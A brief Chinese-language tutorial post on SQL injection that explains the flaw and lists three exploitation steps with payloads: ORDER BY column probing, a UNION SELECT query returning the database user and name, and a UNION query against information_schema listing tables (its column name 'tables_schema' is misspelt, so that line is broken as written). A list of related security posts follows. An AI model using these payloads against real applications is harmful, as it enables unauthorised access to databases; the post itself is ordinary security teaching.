网络安全之SQL注入

漏洞原理:

在输入的字符串之中注入SQL指令,在设计不良的程序中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行

如何利用sql注入:

1、判断列和字段数

order by [column_num]

2、联合查询其他信息

'union select user(),database()#

3、联合查询表

union select table_name,table_schema from information_schema.tables where tables_schema = '[database_name]'

相关推荐
其实防守也摸鱼16 分钟前
ctfshow--VIP题目限免(包含原理和知识拓展)前10个
网络·算法·安全·学习笔记·ctf·泄露·web类型
CYRUS STUDIO21 分钟前
Frida 源码编译全流程:自己动手编译 frida-server
android·安全·逆向
一名优秀的码农24 分钟前
vulhub系列-68-Momentum2(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
老张的张Z35 分钟前
CISSP 域4知识点 无线与移动网络安全
安全·web安全·网络安全
小高Baby@1 小时前
CGO_ENABLED=0 导致 SQLite 驱动初始化失败
数据库·sql·golang·ai编程
数厘1 小时前
2.19 sql限制查询(LIMIT、分页查询实现)
数据库·sql·oracle
数厘1 小时前
2.17 sql条件筛选(WHERE、比较运算符、逻辑运算符、BETWEEN、IN、LIKE模糊查询、IS NULL)
数据库·sql
志栋智能1 小时前
超自动化安全:构建弹性安全架构的关键支撑
安全·自动化·安全架构
Hacker_seagull1 小时前
Sqlmap 工具保姆级使用教程
经验分享·python·web安全·网络安全